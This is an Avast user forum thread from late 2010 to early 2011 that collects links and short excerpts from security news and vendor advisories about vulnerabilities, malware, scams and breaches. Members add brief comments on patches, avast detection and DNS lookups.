Avast seem to detect this according to a 3 day old Virsustotal scan. It detects it as: Other:Malware-gen
http://www.virustotal.com/file-scan/report.html?id=b3aa7d92b97cbbc57b563bfb92204931efc3264612b20c754d948edb1f310b51-1293443980
-
Comodo DACS (Distributed and Collaborative Scanning)
I thought it would be a good idea to put this in the security warnings and notices section, hoping that Avast will put it as soon as possible in the PUP list (I'm serious), and may be add all Comodo links (forum, blog etc...) to the Network Shield black list. thanks.
-
Comodo DACS (Distributed and Collaborative Scanning)
I thought it would be a good idea to put this in the security warnings and notices section, hoping that Avast will put it as soon as possible in the PUP list (I'm serious), and may be add all Comodo links (forum, blog etc...) to the Network Shield black list. thanks.
Logos care to explain why?...............or are you scare of Comodo DACS features
-
Android mobile malware has botnet-like traits
http://www.pcadvisor.co.uk/news/index.cfm?newsid=3254754 (http://www.pcadvisor.co.uk/news/index.cfm?newsid=3254754)
Internet Explorer security flaw that allows hackers to take control of computers
http://www.dailymail.co.uk/sciencetech/article-1341402/Microsoft-warns-Internet-Explorer-bug.html (http://www.dailymail.co.uk/sciencetech/article-1341402/Microsoft-warns-Internet-Explorer-bug.html)
-
Internet Explorer security flaw that allows hackers to take control of computers
http://www.dailymail.co.uk/sciencetech/article-1341402/Microsoft-warns-Internet-Explorer-bug.html (http://www.dailymail.co.uk/sciencetech/article-1341402/Microsoft-warns-Internet-Explorer-bug.html)
Key comment'We're currently unaware of any attacks trying to use the claimed vulnerability or of customer impact.'
Fear mongers are rampant :'(
-
Hardly fear mongering, is the flay possible/feasible, etc. it doesn't matter if they are unaware of any attacks. Being unaware is hardly a glowing testimony that it isn't a problem. If/and when it does come to their knowledge it will be a bit late in the day.
You can hardly call it fear mongering when it is Microsoft doing the fear mongering as you call it.
Microsoft have warned about a flaw on the Internet Explorer browser, that could allow hackers to take control of unprotected computers.
-
Privacy Alert: 10 Biggest Threats of 2010
http://www.pcworld.com/businesscenter/article/212631/privacy_alert_10_biggest_threats_of_2010.html?CID
-
Critical update for WordPress
http://wordpress.org/news/2010/12/3-0-4-update/
-
Hole in VLC Media Player
http://www.videolan.org/security/sa1007.html
-
***
The State Of IT Security In 2011
"Here are 10 key security trends that we see in the upcoming 2011."
http://www.crn.com/slide-shows/security/228800318/it-security-predictions-for-2011.htm
***
-
Targeted attacks against recently addressed Microsoft Office vulnerability
http://blogs.technet.com/b/mmpc/archive/2010/12/29/targeted-attacks-against-recently-addressed-microsoft-office-vulnerability-cve-2010-3333-ms10-087.aspx
-
http://krebsonsecurity.com/2011/01/white-house-ecard-dupes-dot-gov-geeks/
A malware-laced e-mail that spoofed seasons greetings from The White House siphoned gigabytes of sensitive documents from dozens of victims over the holidays, including a number of government employees and contractors who work on cybersecurity matters.
The attack appears to be the latest salvo from ZeuS malware gangs whose activities over the past year have blurred the boundaries between online financial crime and espionage, by stealing both financial data and documents from victim machines.
-
Microsoft Security Advisory (2490606)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2490606.mspx
-
Microsoft Security Advisory (2490606)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/2490606.mspx
Key commentsWe are not aware of attacks that try to use the reported vulnerability or of customer impact at this time.
Non-Affected Software
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
-
http://www.csoonline.com/article/650614/is-storm-waldec-botnet-part-of-new-year-spam-campaign- (http://www.csoonline.com/article/650614/is-storm-waldec-botnet-part-of-new-year-spam-campaign-)
Is Storm/Waldec botnet part of New Year spam campaign?
Researchers with Shadowserver Foundation think they are seeing some new tricks from an old botnet. And it could mean a comeback in 2011
-
http://nakedsecurity.sophos.com/2011/01/04/fake-microsoft-update-spreads-worm/ (http://nakedsecurity.sophos.com/2011/01/04/fake-microsoft-update-spreads-worm/)
Fake Microsoft security update spreads Autorun worm
In the current example, they've spammed out an email containing a worm, which even quotes the real name of a senior member of Microsoft's security team - Steve Lipner - to try to fool you into believing it is genuine.
-
Floating point DoS attack
http://www.h-online.com/security/news/item/Floating-point-DoS-attack-1163838.html
-
PandaLabs Annual Report 2010http://press.pandasecurity.com/wp-content/uploads/2010/05/PandaLabs-Annual-Report-2010.pdf (http://press.pandasecurity.com/wp-content/uploads/2010/05/PandaLabs-Annual-Report-2010.pdf)
-
lol it didn't take long:
Researcher breaks security sandbox in Adobe Flash
http://www.theregister.co.uk/2011/01/07/adobe_flash_bypass/
edit: BUT:
An attacker would first need to gain access to the user's system to place a malicious SWF file in a directory on the local machine before being able to trick the user into launching an application that can run the SWF file natively. In the majority of use scenarios, the malicious SWF file could not simply be launched by double-clicking on it; the user would have to manually open the file from within the application itself.
The company's security team has rated the bug “moderate.
... so no need to worry really.
-
Floating point DoS attack
http://www.h-online.com/security/news/item/Floating-point-DoS-attack-1163838.html
PHP 5.3.5 / 5.2.17: Floating-Point bug fixed
http://www.h-online.com/open/news/item/PHP-5-3-5-5-2-17-Floating-Point-bug-fixed-1165104.html
-
Microsoft Tuesday patches omit known vulnerabilities
http://www.h-online.com/security/news/item/Microsoft-Tuesday-patches-omit-known-vulnerabilities-1164865.html
-
PlayStation 3 security fully compromised
http://www.norman.com/security_center/security_center_archive/2011/134142/en-us
-
PlayStation 3 security fully compromised
http://www.norman.com/security_center/security_center_archive/2011/134142/en-us
That's actually pretty cool. Wouldn't mind the ability to throw another OS on my PS3. The thought of making it more of a media center would be nice as well. Guess we'll see what the community brings in the coming months.
-
***
The State Of IT Security In 2011
"Here are 10 key security trends that we see in the upcoming 2011."
http://www.crn.com/slide-shows/security/228800318/it-security-predictions-for-2011.htm
***
Thanks for the link. :)
A lot of very useful information there especially if you go to some of the sights/companies mentioned on the link.
-
***
You are welcome, Nesivos :)
***
-
Mono developers close security hole
http://www.mono-project.com/Release_Notes_Mono_2.8.2
-
With Autos At CES, Are Vehicle Hacks Far Behind?
http://threatpost.com/en_us/blogs/autos-ces-are-vehicle-hacks-far-behind-010711?utm_source=Newsletter_011011&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=
-
Cloud Computing Used to Hack Wireless Passwords
http://news.idg.no/cw/art.cfm?id=72CD2E1A-1A64-6A71-CE4C3EE52F761AAF
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/133646/en-us
-
more facebook malware...
Facebook worm spread via photo album chat lure
http://www.theregister.co.uk/2011/01/10/facebook_worm_photo_chat_scam/
Facebook virus spreads via photo album chat messages
http://nakedsecurity.sophos.com/2011/01/09/facebook-photo-album-chat-messages-spreading-koobface-worm/
-
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/133646/en-us
Right now, there are 5 holes unpatched by MS...
More info here: http://blogs.technet.com/b/srd/archive/2011/01/07/assessing-the-risk-of-public-issues-currently-being-tracked-by-the-msrc.aspx
asyn
-
***
Gawker Password Theft a Wake-Up Call
Analysis: Underestimating your own vulnerability is a recipe for disaster.
The big story was that over the weekend of Dec. 11-12, Gawker admitted in a post on its various sites— which include Deadspin, Fleshbot, Gizmodo, io9, Jalopnik, Jezebel, Kotaku and Lifehacker, as well as Gawker itself—that its central password database had been compromised. It seems that the Gawker IT organization had used the long-obsolete DES to encrypt the password store, had ignored at least a month’s worth of warnings that something fishy was going on, and had let its production servers get about three years behind on kernel patches. In short, the company’s IT crew had utterly failed at its job.
http://www.eweek.com/c/a/Security/Gawker-Password-Theft-a-WakeUp-Call-181361/
***
-
Scam Sites Demanding SMS Payment For Fake Flash, Firefox Downloads
http://threatpost.com/en_us/blogs/scam-sites-demanding-sms-payment-fake-flash-firefox-downloads-011711?utm_source=Newsletter_011711&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=
-
Cyber attacks could create "perfect storm"
http://www.reuters.com/article/idUSTRE70G1IU20110117 (http://www.reuters.com/article/idUSTRE70G1IU20110117)
-
Top Ten Web Hacking Techniques of 2010 (Official)
http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html
Attacking HTTPS with Cache Injection
Apply to IE 8 & Firefox 3.6
http://www.youtube.com/watch?v=bt0Qh9c59_c
-
F-Secure Wrap-up on Case Stuxnet
By Mikko : http://www.youtube.com/watch?v=gFzadFI7sco (10:51 min)
-
Tor project releases update to close critical hole
https://blog.torproject.org/blog/tor-02128-released-security-patches
-
ICQ can be fed crafted updates
http://www.h-online.com/security/news/item/ICQ-can-be-fed-crafted-updates-1170607.html
-
Rogue Facebook apps can now access your home address and mobile phone number
http://nakedsecurity.sophos.com/2011/01/16/rogue-facebook-apps-access-your-home-address-mobile-phone-number/#idc-cover
Update
Facebook regroups on sharing addresses and mobile numbers
http://nakedsecurity.sophos.com/2011/01/18/facebook-regroups-on-sharing-addresses-and-mobile-numbers/
-
Sybase plugs holes in Application Server
http://www.sybase.com/detail?id=1091057
-
Oracle patches 66 vulnerabilities
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
-
Bot attacks Linux and Mac (and Windows)
http://www.theregister.co.uk/2011/01/19/mac_linux_bot_vulnerabilities/
From the department of cosmic justice comes this gem, spotted by researchers from Symantec: a trojan that targets Windows, Mac, and Linux computers contains gaping security vulnerabilities that allow rival criminal gangs to commandeer the infected machines.
Known as Trojan.Jnanabot, or alternately as OSX/Koobface.A or trojan.osx.boonana.a, the bot made waves in October when researchers discovered its Java-based makeup allowed it to attack Mac and Linux machines, not just Windows PCs as is the case with most malware. Once installed, the trojan components are stored in an invisible folder and use strong encryption to keep communications private.
-
Critical vulnerability in Windows Graphics Rendering Engine - no available update
http://www.norman.com/security_center/security_center_archive/2011/134012/en
Update 2011-01-20
Microsoft has updated its security advisory with information about the fact that the previously published fixit solution only applies for Windows XP and Windows Server 2003.
-
PandaLabs Uncovers Alarming Statistics on Cyber-Crime Black Markethttp://press.pandasecurity.com/news/pandalabs-uncovers-alarming-statistics-on-cyber-crime-black-market/ (http://press.pandasecurity.com/news/pandalabs-uncovers-alarming-statistics-on-cyber-crime-black-market/)
-
Bohu Takes Aim at the Cloud
http://blogs.technet.com/b/mmpc/archive/2011/01/19/bohu-takes-aim-at-the-cloud.aspx
http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDropper%3AWin32%2FBohu.A
-
Possible new Twitter worm
http://isc.sans.edu/diary.html?storyid=10297
-
Critical vulnerability in VLC player
http://www.h-online.com/security/news/item/Critical-vulnerability-in-VLC-player-1175195.html
-
Critical vulnerability in Opera web browser
http://www.h-online.com/security/news/item/Critical-vulnerability-in-Opera-web-browser-1175689.html
-
Critical vulnerability in VLC player
http://www.h-online.com/security/news/item/Critical-vulnerability-in-VLC-player-1175195.html
VLC Media Player 1.1.6 fixes critical vulnerabilities
http://git.videolan.org/?p=vlc/vlc-1.1.git;a=tag;h=f8d04ab27701f659102ccdb628abce9aa5dadc2a
http://www.videolan.org/vlc/releases/1.1.6.html
http://www.videolan.org/vlc/
-
Critical vulnerability in VLC player
http://www.h-online.com/security/news/item/Critical-vulnerability-in-VLC-player-1175195.html
VLC Media Player 1.1.6 fixes critical vulnerabilities
http://git.videolan.org/?p=vlc/vlc-1.1.git;a=tag;h=f8d04ab27701f659102ccdb628abce9aa5dadc2a
http://www.videolan.org/vlc/releases/1.1.6.html
http://www.videolan.org/vlc/
Well, that was quickly fixed...
-
Well, that was quickly fixed...
Yes, open source projects are often quicker in fixing errors/problems than others... :)
asyn
-
Cracker offers access to government servers for a fee
http://krebsonsecurity.com/2011/01/ready-for-cyberwar/
http://blog.imperva.com/2011/01/major-websites-govmiledu-are-hacked-and-up-for-sale.html
-
New Scam mail in sirculation, and this time from Tunisia
A letter from a new friend
http://www.norman.com/security_center/blog/per_olav_forland/134881/en
-
Nothing new here, just another take on the same old Nigerian 412 fraud theme looking for gullible people.
-
Nothing new here, just another take on the same old Nigerian 412 fraud theme looking for gullible people.
Many years ago, I even answered one of these letters and strung the fellow along
for quite a few month. Always left him dangling hoping that with the next email I'd finally consent
to sending him the small percentage of money he wanted as good faith money so that he would be able to send me my millions. ;D ;D
He never got the good faith money and I never got my millions. :)
-
Nothing new here, just another take on the same old Nigerian 412 fraud theme looking for gullible people.
Many years ago, I even answered one of these letters and strung the fellow along
for quite a few month. Always left him dangling hoping that with the next email I'd finally consent
to sending him the small percentage of money he wanted as good faith money so that he would be able to send me my millions. ;D ;D
He never got the good faith money and I never got my millions. :)
Yep here is a user guide if some want to have fun ;D
E-mail Scams – Have Fun While Scamming the E-mail Scammers
http://www.suite101.com/content/e-mail-scams--have-fun-while-scamming-the-e-mail-scammers-a326407
and here is one that did it
http://www.cracked.com/article_16234_having-fun-with-419-scammers.html
I like the fake bible quotes he is using ;D
-
Fedora infrastructure hacked
http://lists.fedoraproject.org/pipermail/announce/2011-January/002911.html
-
Kaspersky finds fake antivirus program in ads on ICQ
http://news.cnet.com/8301-27080_3-20029525-245.html
A Kaspersky researcher has discovered a fake antivirus warning linked to ads on ICQ, which is popular in Russia and Eastern Europe.
The ad that showed up in the ICQ window was for a women's clothing company called Charlotte Russe and clicking on the ad directs to the company's Web site, said Roel Schouwenberg, a senior antivirus researcher at Moscow-based Kaspersky.
Around the same time the ad was displayed another pop-up appeared in a new browser from "Antivirus8," that said suspicious activity was detected on the system and it encouraged the user to download the program, which is not a legitimate antivirus product, Schouwenberg told CNET.
The malware attack is interesting for several reasons. The rogue antivirus "scareware" appears without the user doing anything that normally triggers such pop-ups, such as clicking on malicious links in search results, he said. The attack also does not appear to have an exploit included in it; just the social-engineering aspect in which the user is lured into downloading supposed antivirus protection that is totally unnecessary, he added.
-
Facebook blames bug for Zuckerberg 'hacking'
http://www.bbc.co.uk/news/technology-12286377
-
Critical vulnerability in Opera web browser
http://www.h-online.com/security/news/item/Critical-vulnerability-in-Opera-web-browser-1175689.html
Fixed in Opera 11.01
http://www.opera.com/docs/changelogs/windows/1101/
-
http://www.securecomputing.net.au/News/245426,trojan-built-to-disable-cloud-antivirus.aspx
Trojan to disable cloud AV.
-
http://www.securecomputing.net.au/News/245426,trojan-built-to-disable-cloud-antivirus.aspx
Trojan to disable cloud AV.
Hope avast add signatures for this quickly...
-
http://www.securecomputing.net.au/News/245426,trojan-built-to-disable-cloud-antivirus.aspx
Trojan to disable cloud AV.
Hope avast add signatures for this quickly...
+1 Or my PC will get killed ;)
-
A more secure Facebook
http://www.norman.com/security_center/blog/per_olav_forland/135128/en
-
SourceForge disables servers after break-in
http://sourceforge.net/blog/sourceforge-net-attack/
http://sourceforge.net/apps/wordpress/sourceforge/2011/01/27/sourceforge-net-attack-update/
-
Hackers turn back the clock with Telnet attacks
http://www.networkworld.com/news/2011/012711-hackers-turn-back-the-clock.html?t51hb
-
Update fixes DoS vulnerability in DHCPv6 server
http://www.isc.org/software/dhcp/advisories/cve-2011-0413
-
Vulnerability in MHTML Could Allow Information Disclosure
http://www.microsoft.com/technet/security/advisory/2501696.mspx
http://blogs.technet.com/b/srd/archive/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability.aspx
-
SourceForge disables servers after break-in
http://sourceforge.net/blog/sourceforge-net-attack/
http://sourceforge.net/apps/wordpress/sourceforge/2011/01/27/sourceforge-net-attack-update/
More info: http://sourceforge.net/blog/sourceforge-attack-full-report/
-
Opera Multiple Vulnerabilities
http://secunia.com/advisories/43023/
Solution
Update to version 11.01.
-
Serious new flaw found in WINDOWS ::)
News
http://www.bbc.co.uk/news/technology-12325139
Fixit available here
http://support.microsoft.com/kb/2501696
Advisory
http://www.microsoft.com/technet/security/advisory/2501696.mspx
-
Serious new flaw found in WINDOWS ::)
affecting Internet Explorer exclusively. But as I use IE9 off and on now, I applied the temp fix earlier today ;)
-
If this temporary fix is applied, will it be automatically reversed or updated when a permanent patch is installed?
-
A New facbook scam in circulation, this time it is fake facbook security
Facebook Security Spoofed, Used for Phishing
http://blog.trendmicro.com/facebook-security-spoofed-used-for-phishing/
-
there is always someone that takes the bait....
419ers strip lonely heart mum of £80k - Handsome US soldier actually Lad from Lagos
http://www.theregister.co.uk/2011/01/31/419_mum/
-
New critical vulnerability in VLC Media Player
http://www.h-online.com/open/news/item/New-critical-vulnerability-in-VLC-Media-Player-1180905.html
-
A New facbook scam in circulation, this time it is fake facbook security
Facebook Security Spoofed, Used for Phishing
http://blog.trendmicro.com/facebook-security-spoofed-used-for-phishing/
Several misspellings in the "warning notice" should be the tip-off that it's not legit. I'm ignoring your own "facbook" in your first line. ;)
-
I'm ignoring your own "facbook" in your first line.
dam this 10" keyboard :P .....let me see your Norwegian spelling Mike ;D
-
Another "facbook" one ;D ;D
http://community.websense.com/blogs/securitylabs/archive/2011/01/30/quot-fackbook-profile-photos-quot-malware-is-coming.aspx
-
http://www.theregister.co.uk/2011/02/02/waledac_account_compromise/
Researchers have taken a peek inside the recently refurbished Waledac botnet, and what they've found isn't pretty.
Waledac, a successor to the once-formidable Storm botnet, has passwords for almost 500,000 Pop3 email accounts, allowing spam to be sent through SMTP servers, according to findings published on Tuesday by security firm Last Line. By hijacking legitimate email servers, the Waledac gang is able to evade IP-based blacklisting techniques that many spam filters use to weed out junk messages.
What's more, Waledac controllers are in possession of almost 124,000 FTP credentials. The passwords let them run programs that automatically infect the websites with scripts that redirect users to sites that install malware and promote fake pharmaceuticals. Last month, the researchers identified almost 9,500 webpages from 222 sites that carried poisoned links injected by Waledac.
-
I'm ignoring your own "facbook" in your first line.
dam this 10" keyboard :P .....let me see your Norwegian spelling Mike ;D
As you may have heard, a great deal of the U.S. and Canada is/are in the middle of (or recovering from) a major winter storm ... it's the worst spell of wethur in ages. ;D ;D
-
IPcalypse happened: Will the Internet collapse? For $ale, my IPv4 number!!!
http://www.norman.com/security_center/blog/righard_zwienenberg/135191/en
-
New critical vulnerability in VLC Media Player
http://www.h-online.com/open/news/item/New-critical-vulnerability-in-VLC-Media-Player-1180905.html
VLC Media Player 1.1.7 addresses critical vulnerability
http://www.h-online.com/open/news/item/VLC-Media-Player-1-1-7-addresses-critical-vulnerability-1182203.html
-
Microsoft's security updates scheduled for release
Microsoft plans to release three updates for critical and nine updates for important vulnerabilities 8 February 2011
Microsoft Security Bulletin Advance Notification for February 2011
http://www.microsoft.com/technet/security/bulletin/ms11-feb.mspx
-
http://www.computerworld.com/s/article/9207940/Next_generation_banking_malware_emerges_after_Zeus?taxonomyId=17
http://krebsonsecurity.com/2011/02/revisiting-the-spyeyezeus-merger/
The rumored combination of two pieces of advanced online banking malware appears to be fully underway after several months of speculation.
What appears to be a beta version of a piece of malware that has bits of both Zeus and SpyEye is now in circulation, albeit among just a few people, said Aviv Raff, CTO and cofounder of Seculert.
The source code for Zeus was rumored to have been transferred to the creator of SpyEye, and it was anticipated that the two pieces of malware would be combined. That evidence has just emerged now, Raff said.
The new malware also has at least a couple of new features. One of those is designed to defeat Rapport, a browser add-on from the security vendor Trusteer that intends to protect connections between a client and a bank server and resist man-in-the-middle attacks. Previously, the anti-Rapport feature was a separate module for Zeus, but now it has been baked in, Raff said.
The malware writers have also added a way to remotely connect to a victim's computer using the Remote Desktop Protocol, a Microsoft protocol that allows a remote user to access a computer using the normal Windows graphical interface rather than a command line.
So far, Raff said it appears that only a few cybercriminals are using the new version. He declined to say how Seculert obtained the malware or how much it might be selling for on the malware market.
"It seems to be still under development, with bug fixes released almost daily," Raff said.
-
Hi ;)
I just read about the fake AV program FakeXPA which is very similar to AVG AV program.
https://threatpost.com/en_us/blogs/fake-avg-scam-software-cops-name-and-logo-real-av-020111
Can Avast detectes this fake AV?
Thank you. Lep pozdrav :)
-
Mailing list application Majordomo reveals file content
http://www.h-online.com/open/news/item/Mailing-list-application-Majordomo-reveals-file-content-1183034.html
-
Hackers Penetrate Nasdaq Computers
http://online.wsj.com/article/SB10001424052748704709304576124502351634690.html
-
2 years and still no fix for Java...
http://slightlyrandombrokenthoughts.blogspot.com/2011/02/java-jfilechooser-programmatic.html
-
ZDI names and shames security vulnerabilities from Microsoft, IBM, HP and Novell
http://www.h-online.com/security/news/item/ZDI-names-and-shames-security-vulnerabilities-from-Microsoft-IBM-HP-and-Novell-1185438.html
http://www.zerodayinitiative.com/advisories/published/
-
USB autorun attacks against Linux
http://blogs.iss.net/archive/Shmoocon2011.html
-
Critical udates for Adobe Reader and Acrobat
http://www.norman.com/security_center/security_center_archive/2011/135557/no
Critical vulnerability in Internet Explorer - no available update (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/133646/no
http://www.microsoft.com/technet/security/Bulletin/MS11-003.mspx
-
Oracle Security Alert for CVE-2010-4476
http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html
Patch available: http://www.oracle.com/technetwork/java/javase/downloads/index.html#fpupdater
-
http://www.microsoft.com/technet/security/Bulletin/MS11-003.mspx
IE9 not affected after current Windows Update
From the FAQIs Internet Explorer 9 Beta affected by these vulnerabilities?
Internet Explorer 9 Beta is affected by the vulnerabilities described in this bulletin. Customers running this beta release are encouraged to download and apply the update to their systems. Security updates are available from Microsoft Update and Windows Update. The security updates for this beta are also available for download from the Microsoft Download Center.
-
Security vulnerability demonstrated in Safari
http://www.h-online.com/security/news/item/Security-vulnerability-demonstrated-in-Safari-1186873.html
-
Hardware keyloggers found in public libraries [UK]
http://www.h-online.com/security/news/item/Hardware-keyloggers-found-in-public-libraries-1190097.html
-
http://www.theregister.co.uk/2011/02/15/bbc_driveby_download/
Streaming sites operated by the BBC were hacked on Tuesday so they silently served visitors with malware, researchers from security firm Websense said.
An iframe tag on the BBC's 6 Music and 1Xtra websites injected an exploit that was housed on a website with an address ending in cc, a top level domain for the Cocos Islands. The malicious binary was generated by the Phoenix exploit kit, which dates back to 2007 and streamlines malware infections by collecting detailed statistics.
“If an unprotected user browsed to the site they would be faced with drive-by downloads, meaning that simply browsing to the page is enough to get infected with a malicious executable,” Websense researchers wrote in a blog post.
A VirusTotal scan showed that only nine of the top 43 antivirus products detected the threat.
http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1297784293
-
Updated W32.Stuxnet Dossier is Available
http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
-
Winamp Forums Security Notification
http://forums.winamp.com/showthread.php?t=327366 (http://forums.winamp.com/showthread.php?t=327366)
We have confirmed that your email address was exposed as a result of this attack. We have not confirmed but must assume that other Winamp Forums user account detail, including your forums username, date of birth, time zone preference and encrypted password (not your clear text or unencrypted password) was exposed. The Winamp Forums are now secure, but because we value your privacy we would like to notify you of the incident and encourage you to immediately change your password as a precautionary measure. If you have used your Winamp forums password across other web sites, please change the password on those web sites as well.
-
New hole in Windows file sharing
http://www.h-online.com/security/news/item/New-hole-in-Windows-file-sharing-1190923.html
Update:
Notes on exploitability of the recent Windows BROWSER protocol issue
http://blogs.technet.com/b/srd/archive/2011/02/16/notes-on-exploitability-of-the-recent-windows-browser-protocol-issue.aspx
My Sweet Valentine - the CIFS Browser Protocol Heap Corruption Vulnerability
http://blogs.technet.com/b/mmpc/archive/2011/02/16/my-sweet-valentine-the-cifs-browser-protocol-heap-corruption-vulnerability.aspx
-
Malware toolkits fuel the botnet epidemic
http://www.h-online.com/security/news/item/Malware-toolkits-fuel-the-botnet-epidemic-1191981.html
http://www.damballa.com/downloads/r_pubs/Damballa_2010_Top_10_Botnets_Report.pdf
-
Foreign hackers attack Canadian government
http://www.cbc.ca/politics/story/2011/02/16/pol-weston-hacking.html
-
http://www.theregister.co.uk/2011/02/15/bbc_driveby_download/
Streaming sites operated by the BBC were hacked on Tuesday so they silently served visitors with malware, researchers from security firm Websense said.
An iframe tag on the BBC's 6 Music and 1Xtra websites injected an exploit that was housed on a website with an address ending in cc, a top level domain for the Cocos Islands. The malicious binary was generated by the Phoenix exploit kit, which dates back to 2007 and streamlines malware infections by collecting detailed statistics.
If an unprotected user browsed to the site they would be faced with drive-by downloads, meaning that simply browsing to the page is enough to get infected with a malicious executable, Websense researchers wrote in a blog post.
A VirusTotal scan showed that only nine of the top 43 antivirus products detected the threat.
http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1297784293
interesting yesterdays refresh claims that Avast! still fails to identify this threat
-
Just took that script and put it in a text file, and scanned it with avast. The iframe was detected.
-
Social Network Security Portal
http://www.socialnetworksecurity.org/en/index.php
-
Social Network Security Portal
http://www.socialnetworksecurity.org/en/index.php
404 Not Found (http://www.socialnetworksecurity.org/en/index.php)
-
Social Network Security Portal
http://www.socialnetworksecurity.org/en/index.php
404 Not Found (http://www.socialnetworksecurity.org/en/index.php)
No problem for me.
-
Thank you, YoKenny. I get the same results in IE8 even after flushing the Windows XP DNS cache. Google DNS (8.8.8.8) returns an IP of 174.122.92.18 for www.socialnetworksecurity.org. When I enter the IP in IE8 I still get the 404. Could you enter nslookup www.socialnetworksecurity.org in a command window and tell me your result? I'd like to know the IP of your server and the IP it returns for the problematic website.
Edit: The Level 3 name server at 4.2.2.1 is returning 174.122.92.41, which at least takes me to the socialnetworksecurity.org German language page.
-
Could you enter nslookup www.socialnetworksecurity.org in a command window and tell me your result? I'd like to know the IP of your server and the IP it returns for the problematic website.
Response from nslookupC:\>nslookup www.socialnetworksecurity.org
Server: resolver1-fs.opendns.com
Address: 208.67.222.123
Non-authoritative answer:
Name: www.socialnetworksecurity.org.2wire.net
Address: 67.215.65.132
-
Thanks. Entering http://174.122.92.41/en/index.php in the url bar gets me to the socialnetworksecurity.org English language page.
-
Flash Drives Dangerously Hard to Purge of Sensitive Data:
http://www.theregister.co.uk/2011/02/21/flash_drive_erasing_peril/ (http://www.theregister.co.uk/2011/02/21/flash_drive_erasing_peril/)
-
Microsoft Security Advisory (2491888)
Vulnerability in Microsoft Malware Protection Engine Could Allow Elevation of Privilege
http://www.microsoft.com/technet/security/advisory/2491888.mspx
-
Microsoft Security Advisory (2491888)
Vulnerability in Microsoft Malware Protection Engine Could Allow Elevation of Privilege
http://www.microsoft.com/technet/security/advisory/2491888.mspx
Key statementWhen this security advisory was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security advisory was originally issued.
-
20 years of innovative Windows malware
http://infoworld.com/d/security/20-years-innovative-windows-malware-021
-
Trojan targets Mac OS X
http://nakedsecurity.sophos.com/2011/02/26/mac-os-x-backdoor-trojan-now-in-beta/
-
***
Man sentenced to jail for eBay fraud
A man who used the website eBay to dishonestly obtain nearly $40,000 has been sentenced to three years in jail by a Brisbane District Court Judge.
Philip John Heggie, 19, today pleaded guilty to 20 charges, including fraud and computer hacking, and another 91 charges of breaching bail conditions.
http://www.abc.net.au/news/stories/2011/03/01/3151995.htm?site=brisbane§ion=news&date=(none)
***
-
Britons caught out by bad web ads
http://www.bbc.co.uk/news/technology-12608651
I have seen the extent of this on another forum, with an increased number of system tool infections...
-
LastPass security hole (cross site scripting)
http://forum.avast.com/index.php?topic=72774.msg606137#msg606137
-
The anti-social network: boys jailed for $26m 'Crimebook' scam
http://www.smh.com.au/technology/technology-news/the-antisocial-network-boys-jailed-for-26m--crimebook--scam-20110303-1bfxw.html (http://www.smh.com.au/technology/technology-news/the-antisocial-network-boys-jailed-for-26m--crimebook--scam-20110303-1bfxw.html)
-
Rogue AV pimps finally show love for alternative browsers...Ruse spoofs Firefox, Chrome, Safari
http://www.theregister.co.uk/2011/03/02/rogue_av_mimics_firefox/
(http://regmedia.co.uk/2011/03/02/fake_av_firefox.png)
-
It never ceases to amaze me how many people will actually fall for this and click the Start Protection, etc. etc.
Basically they don't know what their browser can and can't do.
-
Is avast! warning us about this ???
-
Well the problem is the initial is just a pop-up/ad, the main payload comes from clicking the Start Protection. Then would we see if it is blocked/detected.
-
WordPress.com Suffers Largest DDoS Attack In Its History
http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
-
WordPress.com Suffers Largest DDoS Attack In Its History
http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
WordPress.com Survives DDOS Attack
http://blog.eset.com/2011/03/03/wordpress-com-survives-ddos-attack
-
A Look Inside the Bustling Cybercrime Marketplace
http://www.securityweek.com/look-inside-bustling-cybercrime-marketplace
-
i'm not really sure if this would count as a legitimate security warning, but i'll mention it anyways. hopefully it will show notice in some way. when i got rid of this one file called either "LHU.exe" or "IHU.exe",... it was called something like that. it masked itself as something called "xp anti-virus 2011". while it activated ever so often, i had the new software update to 6.01 and avast then did not detect its actions as malicious/suspicious. i can't figure out where i picked it up at, though, i did some fancy regedit moves and did one last scan in safe mode with avast (new software update @ 6.01) and that PUP got placed in custody (virus chest). i submitted that plus 7 other files to the avast virus lab for analysis, hopefully i could recieve some word on if my findings were useful to this forum or not through that process.
fancy regedit moves:
1. http://www.expertsupportnow.com/870/how-to-remove-xp-anti-virus-2011-virus-malware/
just in case anything goes wrong with your ability to launch *.exe files if you misstep
on regedit fixing, use the below link to fix it.
2. http://filext.com/faq/broken_exe_association.php
-
***
French government comes under cyber attack
The French finance ministry has shut down 10,000 computers after a "spectacular" cyber attack from hackers using Internet addresses in China, officials and reports said Monday.
The rest of the story is at the link below.
http://news.id.msn.com/top-stories/article.aspx?cp-documentid=4694193
***
-
WordPress.com Suffers Largest DDoS Attack In Its History
http://techcrunch.com/2011/03/03/wordpress-com-suffers-major-ddos-attack/
WordPress.com Survives DDOS Attack
http://blog.eset.com/2011/03/03/wordpress-com-survives-ddos-attack
WordPress hit with second big attack in two days
